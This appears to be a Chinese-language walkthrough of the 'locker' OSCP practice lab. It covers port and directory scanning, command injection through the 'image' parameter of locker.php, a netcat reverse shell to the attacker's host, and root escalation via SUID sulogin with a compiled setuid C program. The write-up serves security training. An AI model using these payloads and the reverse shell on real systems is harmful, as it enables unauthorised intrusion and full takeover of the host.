OSCP 靶场
靶场介绍
|
locker |
easy |
信息收集、漏洞挖掘、命令执行绕过、suid—sulogin 提权、gcc 编译 |
信息收集
主机发现
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 20:37 EST
Nmap scan report for 192.168.1.140
Host is up (0.00062s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:AE:BC:25 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.1.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
目录扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.140 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.140/index.html (Status: 200) [Size: 142]
http://192.168.1.140/locker.php (Status: 200) [Size: 58]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished 
image 1,2,3 都是锁头
权限获取
通过测试发现存在命令执行漏洞,前后使用;可拼接命令可执行命令
curl http://192.168.1.140/locker.php?image=1;id;
http get http://192.168.1.140/locker.php?image=;pwd;
http://192.168.1.140/locker.php?image=1;nc+192.168.1.129+8989+-c+/bin/bash;
可以看到源代码里面,通过传入的参数拼接1.jpg,然后进行base64编码,还经过shell_exec 函数,最后print输出
权限提升
find / -perm -u=s -type f 2>/dev/null 可以发现 /usr/sbin/sulogin 可能存在利用点
find / -perm -u=s -type f 2>/dev/null
sulogin命令参数详情:https://www.linux.org/docs/man8/sulogin.html
sulogin 查找环境变量 SUSHELL 或 sushell 来确定启动哪个 shell。如果未设置环境变量,它将尝试从 /etc/passwd 执行 root 的 shell。如果失败,它将回退到 /bin/sh 。
接下来,我们创建一个c程序将uid和gid设置为0并使用系统执行/bin/bash
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}gcc -o exp exp.c 
编译好之后,上传到靶机,然后设置环境变量
chmod +x exp
export SUSHELL=/tmp/exp
echo $SUSHELL
(remote) www-data@locker:/tmp$ sulogin -e
Press Enter for maintenance
(or press Control-D to continue):
root@locker:~# whoami
rootroot@locker:/home/tolocker# cat user.txt
flaglockeryes
root@locker:~# cat root.txt
igotroothereEnd
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】locker
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论